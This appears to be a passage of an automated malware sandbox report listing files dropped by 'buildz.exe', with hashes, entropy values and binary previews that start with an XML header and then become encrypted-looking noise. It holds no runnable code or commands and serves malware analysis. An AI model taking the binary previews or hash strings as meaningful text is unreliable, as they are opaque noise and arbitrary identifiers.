                        Preview:<?xml...]I......m.u...q...J(.|.K....L&.....).7ZL.0.A..{............ q.+....z.d."...(..%u...a....:.rJ...8.:x.*....K.o3.#.j-...M....].kK.......i14.r.....5..{g.).&.L......7.[dV%.'_...x.y..^d-...Bu-Gk.L.w...L1.....^.5}..6.3w.....6...4:...Q....W. ...i......Cs9 .A.IQ.....=to/.........W.1......,@J..g...P.qz........+.`A*.B{}....!.).{.X......C2..[T..n...a..1....7..[...e.AK^...z1...T..-.....?H!E.*......C.T.....fB....n.bZ..eK!.....0Q..R.%D......X..V.C).Q.>...^A...$i.....z.v.......AC.d6.-.iq......[.}.......^.........5>.=Z.3..U..w.?..w.qSy{.e.m.U....&.w5....1....nm...|.......:p..m-......`.|.s<V...bk..5=6P.QUf.^.S.H......I.2.Y..}.\.J.....eob..T...%...'...U..e.S.....,....:j..:.......K.QI.Y.&.........j.Y.SU.<.c...v.u..b....{1{........oS....hH.._..-._........r..Tb.v.q.+..0.(.:].....E...3...1.....R.{0Ox.<e...5.........].`:..K0%...F..ll..E...?x..`......3...i...D..\.............CT/. ziu.U..F..;.@..ct.H...{..1.Q,'..7..;..{.a..0..7$0.....2^."Rm.n.~...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1752
                        Entropy (8bit):7.885816586692658
                        Encrypted:false
                        SSDEEP:48:VwKYDeBJNpnlWDkXANk0BzEiJ7p1gQ5Do0NltoVrUJUD:qKYDkNpn6xNmQZo2lmwA
                        MD5:41E6B2D874782FA592C6D547E0239AB9
                        SHA1:91034176BB8612A0A952060FB5A6F3240C0CBE9C
                        SHA-256:5CEA4245BA4D8865808A1D8E7B098E6CDBC1CB3CA4B251D427C644205907A16F
                        SHA-512:3922ED32B4C3280BAEFCFF79DFF4AA70E1F948949BEFC240AB07BBB8FF8275616D8C4BE1BC5F4A5145881FFDF4ACA8E5AA102C338221CD913075E67CA3B01E07
                        Malicious:false
                        Preview:<?xml..e...NN..../.....QPv.i...D.*..3#....b....y1.......J....GDQ....x.Ha..(.&?.%0..'.'.nl....Ed.......7....N.......;../.>W..v.?.G.W..3].......K.....w;w`Mh&.3....>...V)w..=YNd.......b...ld"...k..I.....,.-.L.?...#..Q..`.L.RI....o....d...g&...&.p.#..~KeBj=."..5....k-K.g.$.+?..,.us..(>..9L.B..L.+...c2..C......."l!BgL...!X.r.z.....?.D8.../..-^.....b.M..B...Hk3=...Dx4....I..+B+...c...W~.6.m:N......G......Y.|k....N...R..\.....)....X.}.e.8N.`..L..LB@*..y..T.........p...r).........d.u.)|G....s.?.4B...g......B..O..0.8....E..fk..O.@E.C....L;..F..Y.5p/@..{p^F..i/......_....]w&..K%..U}.#....6.....R.R.h`P..Z....D^.P.).p.E..u(.....E..('.......z.[.....J...k..-.......YzS^.....3Yn.>:\...9.J..a..2.......tg..%...h....SH.[.i.U.AE...(z8.8....&5w|..g.w.....)....].S.Tr....]Z.... ].S.E.......UIA:_.:...8..x:YY....h..#^..qwM..s<....ht..A...g......Pb"A#:..}...../.u.."UL.g.q..>..2T..FA.mg7.n.(.:....1G...i_..o.;..$).......}..t...?....+..........i.S.gh...6&.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1738
                        Entropy (8bit):7.889530074739284
                        Encrypted:false
                        SSDEEP:48:0f/ziyBqQMiFgjCNjzZh6y+9cn31RL3NPIc3HtHUD:u/ziyBqjCNnEe31vPIc3lA
                        MD5:66D8EAAD12AB230DD95B0C6D466087CE
                        SHA1:A9898638B02875E4EDA3BAE6690BC45B93931C10
                        SHA-256:3F1546D6F7D5C07AC31F195DC3E2C57679FA06DB9AEFE2F472AD9819B997410D
                        SHA-512:6679A62B3C273E26BEF69C9510355180A7BB0C78B23EBD44AC8395B9A2C108D098CCA85543786896D74215B4C76BE93FC9C36399696C1FBB6FAC70EDF29D0768
                        Malicious:false
                        Preview:<?xml....1..s}.\*.1.EH...YKh...Z'm.x......+3r....a3.h.K..6..j.%..v...K..._M..z._..:.*V......t..K...?..A.."Z....G.....|.%..w.x...t.v.>.?.<...e.K.Ed\k.;..R..&k..)..:.M>.L7].r..Av.v....,..4.j...k....8.r`....&..2..E...+m;w.h...0O..n...0L.M][..O..vo`.Gp.U.y..9f...#6t...v..9.RUub............C.&k...h..8.i.m..........._xL....#.H....D..(..,.pg;q..2...z.]X......&....b...*$....]Z..6^5,.,uc...r"..&.l.7......1..........i.Z.q.)?.0.l....=...0........(.....XF..i..W..u.[..[.C\...v..Sn..d...wf.t...t.RUW...|......p.T..Y..Ok.......Ze.^g[.>.8....@..C.V..)..v.....*.h........i).P@.....G.?.=..X.Q..<........4....4..<}........j\#?.....)..P..H{..0l...r.....bFf.0...z.S.U[.qqePu..w..G...?..1.OM.gm..?.....<...........<`.(a..FJt....m..x\.oB<.N.F`....L...._.7...xv)/..H...4...v.ik.Sx....2.S0h..Y..@."&0..C..xZ.E...,....J....C......V3.&..F2..t;..t..H..$1*.o...W.6.w....h...'..@..n&.O.f...sn@..b]..[..2....a..&.A.b.*...4Cu..p...?X....Zi.F.<...|.r5..a"0.....G.......
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1775
                        Entropy (8bit):7.872432600205322
                        Encrypted:false
                        SSDEEP:48:axsVriwhf6Dr3Y1htKiWe4a37W+I32tyLsFmRDKUD:axsVuAMro1hNGa37WHs2KA
                        MD5:2BA39C1F651F1C6F4C7717AB2FC6BB7C
                        SHA1:0DC9F496EF837EC5B21E72FFA1BB347C3441015D
                        SHA-256:3618BB22EFAAA54A85F9633C79EFEFD54484E6571E86F0FC98B63729447F9B70
                        SHA-512:6645EB5CA443160848F4E743C51B39ECEF2553609CC68123689241C898B8024305B971CC9E51EF828D6AD70EC53C16898EDF51868D0EB38D3BD2D63BB674C2C0
                        Malicious:false
                        Preview:<?xml.0&... 3.6P.t.k.....Z`.jZ...PA.%.b_J)..g...2R.....~]k.l...t..K.+.7.`.t..4.a...0PPi{.Zlm:.'..m6.>...:..XSC....?..|o.~c.3:..E... k$D../..Qr..R.........@..t..C.#q........m..l....-.U.....?....sC.p.f.....X.......E....{..a....z.}.2......c........i.G..LV.P........)........i.@...G..1.c.-.!....p.b....NUF.O.%...i.....C.'..z...LV.....C....*.J#....xL?.......1....}...$...l4H.....I+...-..l..).N:..x....t.p?.Y!....:..C.......Vb...1....0A;.. .R.....,......t^...?... ...f?.1.....u(.Q.....A.H......>.0.&-.x..#....P...\<..H-J.......'...>.^4.Q../...z.\y.i.l..UO?.D.....$<.(_.m,qc.E.......J.AB.....K.^.S....U.!'......T..e...m..$.q.cgs....).%.s1DEd`].....!....f....v.$.3..oxr.vQE4=.e..e.9..............D...d....D....4&.L...?I.7..@Q........IO....a..J...A..$..~.i.0.).o..MG ..0.,...4...g...!.....8..:?.m......-\..V....a\....t...49.q.]\.8L.....Y...*.^!.....r.x.....o....A.y....d4..8....E/TE`...{........e1$....|.I....._..H{..3........zS.pY.|F.!(.R..S....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1723
                        Entropy (8bit):7.87164653217732
                        Encrypted:false
                        SSDEEP:48:n/jxUWeNvC4wNsPx7zjPaO6sxMvIBWzUftMLDPFgZUD:n/jxUVZC4wNAFn8sJftMlaA
                        MD5:C3E6F7AC01649DDDE8F6BC29F8B0B987
                        SHA1:DC10909B4019E892B27BEAFE6B86772B781A2C8D
                        SHA-256:75622E90098DE6FD3CFC1E34B98DF4704C9A0FB28741D8BAA2DE5280383BEDDE
                        SHA-512:396A63B3752FE18271F238DBCA11C3FF7115215E08016314C1C409068864D2D417E3ECE1E3C6F47B7A387067B4B8D06B2EA32DA14426A83782F3F50256DACD1A
                        Malicious:false
                        Preview:<?xml...v.....A";@......<.93.G/....p.....h4b....VM2.....t....,.;....4....!..-,.D..6....lQ..T.o...........M.f.'%C...{`;5.......{gZ..V..N...Q..ci..*...%[|i<s..-..S.%........E.V.h%;.UY..\;K..L..%..,..p..<.-...._..\....I..N)...n..zk.Y..b_.V.....b..........n.].'...]v......... ..*.Y..../.0mL..)...1.>.N.]3Rxi..`4..q..[.. u....UBM.p.0..m..GG..*...S.........!0.uxq..jz1....5......d|..r.I_5....D.m...N...y1....$MY..0kL.L.V....R..E..bb..8.>....g/BP..B.*.&..D..x.+..P.....#...a...k........u.,..>..,.q1.s..N.rx..k.U...`..^...N..n.a.....p..B..._.J..*#J..U=.5..+.v..[.y.F7..E.E..^.8..^.......s...Eu..Q4T|x.K].|..........dd..$..z....._a.\./ "v.E.1F..b...1Z."l.#.....4...Dp..0..u...O.....U.".;WW.....0.pM.N...hW.|.jH.Kd^..0RBQdo)..r`*_.h.......(...E...........!.....yZ0.<.S.....c.G&yu......:...].y..L....%...3g.v.p..YD...%[...,9..i\.]5.ar...,.I.Z.T..A...T.dK....-...&..+..g.=.....S.....c.a.r.M..L ='Gl.u..(.3."+.\=l.S.R./..X..{...]^.<.)....W..!...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1760
                        Entropy (8bit):7.888572740347371
                        Encrypted:false
                        SSDEEP:48:WXS6suEM53sYSsqe9V57Vja7B98Z0UFW0bdzUD:WUuEM1L9nA7AZ/FWsA
                        MD5:C6F836E0F1FFCB53E6C5AD4A5D4E21AB
                        SHA1:26F894B6881C4ED12D838E99081BA415E467D219
                        SHA-256:0C58C62C7D0DDDA9DFE83BC7D25FCB377B9801272B5DD98E91DF3E95A01FBB67
                        SHA-512:314A75DACC975BBBE903260C835D90A4C6D16CA10C8D02A9B44BE3A0E4FC117E9847C26EBB8FABF3D0CE7360C82EBB4565AD9EAFD190DE1E776B2755A9D483A7
                        Malicious:false
                        Preview:<?xmlZl..D...L-..,..YA7. ..)7.u......x.o...6.Q.c..=s.!....2Z.4&L..g.F...+......\\8.....S..??b8....h.c+xL.........;DxO-....,....'..A.E.V.*..L..{.LV.m.s..xT^..6.8..F~..K.j..+c..+...V9t.W..R...*&..x(T.,RQ.........u.y.wB.~./ltp/.w..v...h..<..,.."E!...j".R..v(....b..{..j.B.....`..BW..#..O[..P....|vg..F...H..27A..._....4.G.E:..O.._.p....V.&-@N.+k^....aS......A .....7kn.F......"*D".......Y.q3.n:vr.1.@...w_n..6..,...E....bQ..\kl....g......{N..^].U.(&f..._....#.<..R.#.3tz}r..[c.6.f[....`.e.RA.Z.1....J....W....P.W.3...9...G...b......`......d...P......T4Q3.U.........q%V.5.g...5?.=Z].......<9.........j.v<......q.......-i......\kK.............WR...2.(.;.O..R..A|.............W.O,..!.$.B.Z?x.%w.Q..Qj7.n1u.....z.._l[.9.Ga...h.G......#S....f.6..Jq...@I5G..~.O{...e6.7.._..0-[...K..K.Y....b.[*....2..w....e..bw.!pro\1'u^...(b..q...O..l..Q.......?..o..F.#..M.p..&...@0.Lzf...Q........ .kec=.....op...rO...(l........%y.s.R ....iQ.6.E....%..H...P.....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1699
                        Entropy (8bit):7.857661250318212
                        Encrypted:false
                        SSDEEP:48:BnuSPptO+LmrjgfZayhAKhyHZ7ylEPa1nQWIVUD:0UpttagxPhPhyHZyhQWIVA
                        MD5:5196ABAA46B85612D5F80FD0247523FA
                        SHA1:3C24830D4D796A3B49001E56DDED93012F117B4E
                        SHA-256:3CFCA49798209C155D7A2782EF1B5EF7261334A3780E6F1141E2059976D9E94D
                        SHA-512:5CDC5856852440E97B7084A701BEDEA8514AC928CBA44E535E9A8F506194117F44C29345AF8263418218CC160643D37312F92ADB49BD56C3BB9D7467B4C0D8C6
                        Malicious:false
                        Preview:<?xml..n....cXp..R'cnR...DM..@..(.R....Z...]....B..4b.^...'s.*.....Ef I..!....Gh.lj@:...zoI.=..qG.~..`Z..ZB...[.^......|..R6u.=..JK..L'q..`..(....F.&H..0..q..^v....d0.{.....c..`\....I.$.....+:+69'..;."T...h..&.....x7.4n..b.hf&.8..U<h..B...(...{./ .-..\i..q;...}.5.t-e../...NV..qX..f#`I?.{!J....kO\...R.9.....{y..6h.y...f.:x.8...%.j^.....j../.&...5...mb5{.r...5..o5]G......."..../...|....a.Zb.I.....6.l...t......*....e.A......=}.....T......9.=7..]/.J......A[....?y...Z.r./.X.,..0Q.?.!r..L....H.r....7.au..A........^.`..Nt`....48....`ho.A(C.Q....`.\.l=...../Z..x.).QD...p8..W..8...K.!..L..1..|A..............y2...ZG].].......L..&.x`.@+........*.r.rlhKv"WH...a.<..Gy,..0.5..F.).....Q.....t..{.s].(..#tK..k<.m./{....<.'.......;..!6......(.}_=t..R..6.........u..@..b.....,.L..2/..u.X..g...(W.}5.m.d,Va..4.Ww.(&...u..x...}..G...:.:.d..7.A+.g..A..]....a.'..4]......E..6u..3..s.R\.V+K..`.......!r]VI)........=..z^l...s...."d./.*.1..{.\....._.;.N
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1736
                        Entropy (8bit):7.871390706496861
                        Encrypted:false
                        SSDEEP:48:oNGOcobHxjilbqPLWscc3OecmO3DdPoLHfiad4wcYagG+UD:oN3hHlAOLWa3jcF3RIHvcDgG+A
                        MD5:0AF8873EE0C8BF8B40988ADB5C232DFC
                        SHA1:18674D3012F4BD032193344D6BF553B7F91246FD
                        SHA-256:B6BF899AD5E742D02EABC237990BF8739AB484ED4B275EDA74CE9C8E02E98F07
                        SHA-512:AF6FCA6B2DF937EB82C6F479B8CAE820B495E239F1B51B9111FEC980B2EAB831126FE02699CB5F1D6B7779BAC0FC6E65AAA7B93CA0F0F17AC6CAC4E1E34CD83A
                        Malicious:false
                        Preview:<?xml..d..*)nC......&.kj.@...3b....J:.#p.1..]V.x.O....W'F...F4..M...RF>.....s.5.$...e.w.6...\..;h..r.jr.e5.`.R.....Q........z.....a..w.t..h..Z...../..2L@.......J.sTZ../Z.......yo_.%<...U..........%(.q+..._.r..)....g....6..,{..H...._.`....(...=..p...3X.F.u..I.W.e...BA.P0....k....g....-T.'.......AV..I....Tt*.y.x...n........A.A...l..s..u|.......%.\...m..ZVGyn...$v.&.x....6....!hQ6XE.].DD.3..0?.;.%..F..q.._}.Q..).x5HD>..@.?..Mb..#....... .#.$..^&......h.;..l8y.....`....].......k...B.C,...j..B3..J(:.{..#&Y..M.,.8>?ek;...?!9......%:"T.W......;.y...3t....Gy,........W\Q^....Gw(s2.._h5....3.FM.y."..x....a..T..%..i..C.zg...F.'.u6*{.z.M..../....1.L-1D...-o.S........KYO.R.....W...&z.VR.~g.(..\.K8...y{n'.@#...'..........Z8:...jm.P5t.<-..:...FMr...4.}.Bc...6..S..B.:2..5.z...R#.#..u...+.6g.......?.......diU.3f$z......y..i..(2.%...I.q....v...u...L..D...U...e....j.8.0T.x..hG.........n..t..@...L.4..{r..{r...k..^I.%.%.x>(h.q..4M.t/.M.+S...5..C<grD....>.D.q..w..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1715
                        Entropy (8bit):7.900755637420129
                        Encrypted:false
                        SSDEEP:48:beGA3lYABbbzRqB6ENeH5z4xI+opAcHFnUB+2xuTaUD:beGyYA9xqgz54xV6aluTaA
                        MD5:0449D5100B87C1C64D1812D075D9C170
                        SHA1:B52172B7212F815C9764181E72520280AABD4469
                        SHA-256:12FF27291CE158A2AFC6FE722459E5F4D2BE94209EB8EBFCB5F464DD537995FF
                        SHA-512:38DCBFC7421A4F4149ADED8F79908576055D93B8AD7951ECB055469FB04EDB6D94A9DDB7409D45F0872409833C35E688A796FB71CA8A112C74D94C0DB0FB0746
                        Malicious:false
                        Preview:<?xml.(W.q.q1W..l.=...z..."bQ..>...y..2x.#G.LB.J.3.R....o..O ..:.C*e(~..m{...].w....._.J1PfN....0..S..;..{..6.u;...]..U.~..J5y_.BR.*uU.#..ai.~b:.!x.....[.60v.8..5.m.E...5....x+...q.y.l.1.).sB.S.......X~...."QQ..@V\....(. ..8f.L....3......p.7.....L.k.xl<.<M.(..^A.A.C..Y..mH.[.....c.K_..V....^.d....Z.\.h"...C..C.......~R..JU....M.Dxf.x.j0.v.<.?X..w^l......ml..D..9...+.?..S.(.}.V]..Y...+z..y.................`$a.w.f......3ST.....5g...W..4................z..O..*..g.;jP.j1..z...!.}0..C.PP...,..VT...4:..)..[g.!.m.rib-i.O.g.8.-2...4.$.;...o....H.....dM.3p\.]..~^~..v'X=i..'2....p.{.[v.X.6.....o....Y...a5Lt.X[._.mS...............P..6..Hd..q.Zo|.s.:.un.-..\.p:...R.q.c...s.q.s8.+....}/............7M.Y.vB...sto..I..~Ln$V:.N5.9........M...b..(\l/.^.W.>.Dg...........2....J...QB.i..t.`i..F.....w.Y..zS{....~.*.Q.8..![2..<......9...9..i..A..Q:.8...(.o*..}^ .A%...,.gc...ab..T.-.k.[..^.fh.4xC9W8.....x]{0G..*.z..lRG@.....^]..g...4..HE..Y/t~._'$...@...r.uI.\l.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1752
                        Entropy (8bit):7.879471627481945
                        Encrypted:false
                        SSDEEP:24:C0HqFGdM7E+IVUkC/+4h0R/qjt5ZBV43G25rl9QVm2um6A2L+kFvUygYc7VGbD:C0+GdnLCXVqR/y5ZD239QgW6Syv4ZUD
                        MD5:6698EA6F55690F4B3364D5349C2F086C
                        SHA1:95A3AF73F0CCD2373CB16B08CC8E95320BF36957
                        SHA-256:2706D5D781CC850F4A59F31CE4EFF03384E40C37963BF306A13D77198CC954B2
                        SHA-512:0D0F126E7D858D67DBA2ACBEFFE074ABF7BAA88BAED0C63DD2941E5F1E4F258E6C987598F9EAACB1EADC055373A279B95D9619A16EF09717400F9C4006AEE586
                        Malicious:false
                        Preview:<?xml..=.C.=..I..w.t<. .wU.B.2.at..`ZR.....|%?h..[....<Z.....A@..C..$)..7.`.......\.......:.........EU.......0"K...$8.G..P...-CM......{.=%l.^.R........?..L)j.t............PX..;....0....%..XwB=....D..g ........96v0...l'..Kv._.%..Z_..*$~.M.#=..../...m.....<}...Z.V........]W.0..m...I%..-@{..E.L...q..u..e.s..x....).L.j#..F.m..).l.....5.............y.ah.... ..H...]..U.%..$...oc$....I.`.....M?wcq..@.'.s.......s...(...,..f..J....t..;..E..V..~.......F3.....G......U...m.(.W...+tOP.......n.+...2..i..LK.9."3...v.w[9.E...cttN..*.z....{.5m}.!.......@.........o.4.a,>.+...RIv7..."...y#....P."..X.E5....Q69J....H}..(.p.Y5.!..*P.BH...T......A.....^^.#R.....p...m......m#M.1......./.,..t....>......O..u.8.%xm.o.....$.8../...(.S....O...f.D......v*'..x..?.5.TE...Dt.?.L|Z^W..8..*.o%i..qh.w..2.E>....k2#C....N.".f.G.\(..h...0..v..ME..MK...emO..e....w.z..Y@...Q`..H...!M@....>......Gza/...M.>G......@..q.]e.......l...g.<&..$Y9*q..`$......T......
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1689
                        Entropy (8bit):7.879945723501044
                        Encrypted:false
                        SSDEEP:24:HcmEh8MDiA7nFQ1Bg9328wvuRCe/aQQYNsbNldALZDvpV3bpFK//QHE0AHGbD:HcmEliAuU3qvur7Ni1ANDvpVrrO/fUD
                        MD5:501B1F231BD9B69B683E7BE4659C55B6
                        SHA1:8ED8AFFE2F53A560786565F43AF896A98C61A4CA
                        SHA-256:FBA9B74B1BC50D6DC0A6635E475F53404692D8D59139407A6A79FA17EAA977C2
                        SHA-512:99DAD9A7DA329F6E6456F62A01CAD073A725E1D19DC4F702D131310249FCD8893A287C0C9B501A97C2CAD32260E541BA0BB75627B54B2490C98E04B42AEB852C
                        Malicious:false
                        Preview:<?xml.t....)..... ..z|....Es.P.<).[..bV*._.,.r......VN....H........F.A..t..".N.....\.Z.O.+..O.. ..I.Q<..T...vx6.Dx......b...O.....3.vV.E. ....*...D.<...>dji.B..P>...Q F.,=...%...]..>U.M......5._["`..:...........q;.6..+^H.....B..O.'..t...A7./..........K..0-E./..9J.....(...7....I....X...9.pT@...N...A2...%....<.p..L&h....[[.+1.K...Na.qhb..c.\./...Q.){...>..aX...R\ ..4,..,@;j...D.j..W..t[+..=|J.T..Z...6.........j.a.Y.k...].WG..c....e...ZYM.By'.}......d.w.RL.P9.5D.(]S_..DE.....J/..\.'z.pV...8-.}M+...+.............(..Mr:_...PS.i.1a>..2...46...;fO..h.9B.]3.%.....X..)HT........u.N.....C.c.#....5..'1.T.I..<.K.(..U..."3...G..........{.u...I....H-..:.~.H.........].l<....GJZ.t....+|b.E.-)j..O.....s^.ZV.....X7...*,..W.$A..H.m.......pO..<.!..y..aS..vsl.7..[.E..t.$.`-0t....UyR..)S....l....)..y..8.......n~.<.fP.3X3.....|....dW....z.:.q.dM.."...'.Y...o...c-.5.E..'..b2c...l..-...7..c..C.4W5x....=.B..i..+.k......"{f;..v...S.1[b.o.m?2......a...S........)..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1726
                        Entropy (8bit):7.896210006031798
                        Encrypted:false
                        SSDEEP:48:vjUbJrEcFX1H8VRmCGFXVawEYnfX+4c8vLTOUD:bUdrTZ8rnGxV5EYWkeA
                        MD5:2992681D792769ED3793B073183DE2F5
                        SHA1:C7C2861C22C13D1DC530371F0606B43FD58635BF
                        SHA-256:D90D5E4C8B38D8D408213C83C40F9A4359F77F1ACFCABFD9CD1B4F037E6E9B47
                        SHA-512:D9FD258FC94BA6DA4283AF1A1CA41807D315556900A62DDD31BDE004E528EE90BEA40B9F934F3D53C2192381A7D98C7A11823F01323031BA368E9E708DAFC1D0
                        Malicious:false
                        Preview:<?xmlq....N.kj.OSQ%.tg....k%>..(...V..B..{.KNF.J...=3.V+....Z..SN......!N.3#.V&.......k~C..\.p...'.z...=.n.eF....C..O.$.yi.-....\.Y.....uP...5QR_...^e.dm.8...S.~.k..*.#.M...i..Qz..f......}<..R.a.g......If.&+x.O..*..x1...w..X."H.TB.:.>....aq8..2.)...*...&_....?UB.K......L...,..X`...._8..C....R...........~..S%Es6...N.J.Q.J.?.c.s.OIv.v+Dz.)..G.c.:=.b;..[k\r.A...Kh....co.....?.`..7... .`)....,7.b..+q.o......CW......D..r.#....v.....=...&.&o.K.~.3...z....$..)...Bd;...c.@.ph..g"..m..w..H..2...4j. .....B8A}.1.K._.-.QFC....&p..tIt..V..5B)7P..u.]E.......C..f..-L:.kvr....b%s.OR.z6.V......c.r....{..LV.2..i...h..U.|^l...e..e..>..b....!.....JwH...Z..........6...m.[...a0.......0..J.0..4...........S..g...]..:#44.~./+..e...@.N.W......1.$.....37ve......C....8f....o..La..O..+.6..@...G^..-<..s.d..;.In5.b...#..^..7..ePV.m].............Xt.7...Rfb..}..y0.u..\R..f.'.dB.m......~..f.^..$;Pyg+.T...X.d....'.....W.cs.`nny.|..p...o'vr....k4..... ....../.L..b
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1695
                        Entropy (8bit):7.884896925043023
                        Encrypted:false
                        SSDEEP:48:wHCYqo55sQqQhvKNdhf+Ik0/g+VpncLmUXmtXAlbWKMXrKUD:7YhPqQhv+n+Ik0/giHlwbkX+A
                        MD5:DB1BA4B871012F59226D3885542A8FA1
                        SHA1:6E689762317BF1D98ACFB86E3FC789A95BC89B35
                        SHA-256:E5F1579BE7292E6DD6B5F3EAF84271C68060FF9DD31246D06FCE82A47B2E46A7
                        SHA-512:91B225C78A5B898B34A03FF8F1FE528731487B00707B6C106AC43972A5116922430D4878EC06AA145EF192D58466999471EE482541FC48599D01E760F6F410F0
                        Malicious:false
                        Preview:<?xmlaFb03T...J4...*....q.".IGEW...i._..[...4...-.G...I.I..c...J..`:.,F).-./....#..HR.|....vqT.."............O.05..(. ..A.&..N...%EC........D.......3......P..i.....} B..F....'%M;.)U......,..8.4.R.#...~\.y.=...~............M<..a.:.e]...V..ZDO.5....(..].;..7...P..j...f.&M1;....F...g.>B.5.u.E.....8.......!<..vF.ta..J.U... \....}..!.E.......P.......Q.vOt6h.M..%NaS.cn=...pt.....<...QNVh.....=.........M........A;L...1..S.D.lR.K.>..a...|..>...~N".5.:^..^..8.'F7'8..o..3...J|...L.s3..8..2...!.j.....;O,.!..."...W........bL.U..h2...z..._...u.0...[w.S`r..\D...j..S....H.*....a...@..v..V.Drf......... {L..aZe...b...DG3P.L.z......}.rK.g..18.%....gm..lQ[s...D>...#tC...=....w4.a..'a...Kg)R....`.......Bq.f....~../.$W.z..VM".....,.d...R......^......U7_......h.)..'.Il.`.]'.......*g,.|......o..f.S.{....R"w.a8...&.}.M.3.<.L..s..D.U...*g....?.N.n3..d....zo.$...J.a.h............z2...Xs.<q....Y.[.6.Zu....daf....;l..4v.XH9v>v"..*1..l..`.{.j...b.m.W.HP.v...w.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1732
                        Entropy (8bit):7.893837415622281
                        Encrypted:false
                        SSDEEP:48:cfk3h16YKIK+XqyT2RGUp3DL0zguDzUy9KUD:lhkOZ32RGUmFoiKA
                        MD5:45B31CFB274B7B42C3DF729E23A554EC
                        SHA1:43010D5BCAE34696832CF5B16C10B7BE50095734
                        SHA-256:2AD3DBC3E50BA0B82DE8DC15CAC4873688E321F3F3DF31F710180DECD5EBEA18
                        SHA-512:B2E5D0235474D7955ED4806C14A8F55E0392D57B44DF065B28D93344EF5560437829D94D5AD674F32625ADC9B5EB4A51AAC8A6DFFBB9BC9582AB7DA94C60A3C6
                        Malicious:false
                        Preview:<?xml1).\&.p....^.y...{g......S..r...g.....u...M..<3{vk.].q.O..i..K'..F"*..;.Z.N.. ....A.:[......}........A...Q..c..Kz..}*7.....a./%.N...Mo.}#..+.hT.).X.]...<.o.".....x.0..../.2N.....;6%A.......O.{..nr+..V..2.](.......mD#{..w#)......./..O...^.TZ..+.k,.<wb....L/.$........y6.=Y..]..@W.....G. $.U...<.A.GG^....B.."=z2..t.u<[.V.O|.....c....z...b.Xa.....Z..CP2.~...h`"...W.9..oD......$xF.uP.[. X.|...?.p..W....;O..4...u:....U\p...If..}..}.`2.n...q..H...f.].s.t....=S.7..a......'.S......#s.....?[Z...X.\....nB...HT..|v,y.....G.4'....+...5.....V.......q..(..)BOy.m-.......+..:.....!IR.....m.....].PZKa....".z......5.D.....0g...c%]..e....T.x.....O.Pq..Da/.;.ni.Y..b.#......^-..........4.f.. ..1!..(Y..,.gO.....8........<..=...&......@{.$.j.d...3...s.*=.P....7.....v..d...B.....d.L........bO,..c.oD.p..{r2...B...A.,..<.`..[.yd..N3.k.9....{U.0.c.mG.K.D..Pa...;.`....M.....rW.%....^...A.%.%..G1...%.Yv.....D(m..h.S....+..v..So^0.1.3;.b..c.N......T<....N
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1695
                        Entropy (8bit):7.8754558243208646
                        Encrypted:false
                        SSDEEP:48:8v3rkgojrOsRKdZqOOXVMn8eQ7zIFhYHQqHUD:8v3lArOskZAVM9Q3IXYpA
                        MD5:4B60CE96B46C463B5C215BF369DA92E6
                        SHA1:FD1E6DE869B0AABBB5BBC8D0EE6EF4A0D315B991
                        SHA-256:91554267E7207B817057126D67192F1B846ACAD3A570420CD68BA057E11440B3
                        SHA-512:0C05FF1BE48141ED692349A9679098216789857728809AA8583D6AFF55E8F8B16F5FDD84E8D86C7AAB94B2B0FAC49C367D6EFFCFB1B3B3BE70DA942F311C98B2
                        Malicious:false
                        Preview:<?xmly..~.6}....z......9..?K..#m..>.Zk..K.V...5t<.$.>...i...z.xf...R.:..9.F ....L.2.A_.n1.nEY....f-l.,k...d.Kj...^b..;...#..%ii..3.Y....;{.!.+.*Z..V=...z....>.%.q.H.R.x?U.SB. ]...'./...:...%.J......X...W.3...T6.m.....[..+...x.......:E......[^9dSqfeQ.+E7.8......q........;1^hjx.p....|.P..0.x...fv..I..L..u.....2...f..|........N....F]......vb/.3..S.<G.-0.{.o..S*.o...[.nK"..x..i.........z.PX.6M...Z.,...n.......w.&.N.....H.}.........7........@.!SXo....&.....w....=Bq.......j[g..G4.O....%!m.>.._.\..#.... ...$.m....a.lQ...A..s-..e.B.P..L...;3..7..6...Jb..."J. '..6..*.e.sj...h..QZ...W.G.{u..\.ns...nxB.KE.G.Zej*..f../Z..r.?=.!...#.@...)......f.0.S%...)..%..:|8J.OF.|g......*.......1e.....(*..r:......O.0;./x-.ltI>.\9..k._.....^.....-.4L=.?aZ.eJ..Z.....fBa.^r6....si.w..-P-lm......v...{.....3.J..;.I....}3l....c..U.c....fd.:`.WR.AI)..../3.R.oi...}'......z..".9..y...S2..].GK.Dz.R5....p.x.8..|-........Q..+f..J*L.r......G.Np..0)x0..iK.....!.`.Em.....e.R.7
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1732
                        Entropy (8bit):7.898981904687625
                        Encrypted:false
                        SSDEEP:48:8SikIhGC/QxoYod6ydG7AV9UNJhxcsUF7WaUD:8j7uYky/9UNdXU1A
                        MD5:357E7441B6E3807B921F444A2AADBFFD
                        SHA1:D464D5A06E946E09FCA46E2CEED192827371D7E1
                        SHA-256:0B1DC6063ACC41814A3259AF5C1B7A371AED681928804EF4DFD050C53AE80951
                        SHA-512:E7D5AD23838533E094C2DC10F999D6D795B9697D61E4C2F8DB0C1D5B1823B77A828917B0489822DEE78B6472806CA827B01A76F448F0505311C8800C4DEA96DE
                        Malicious:false
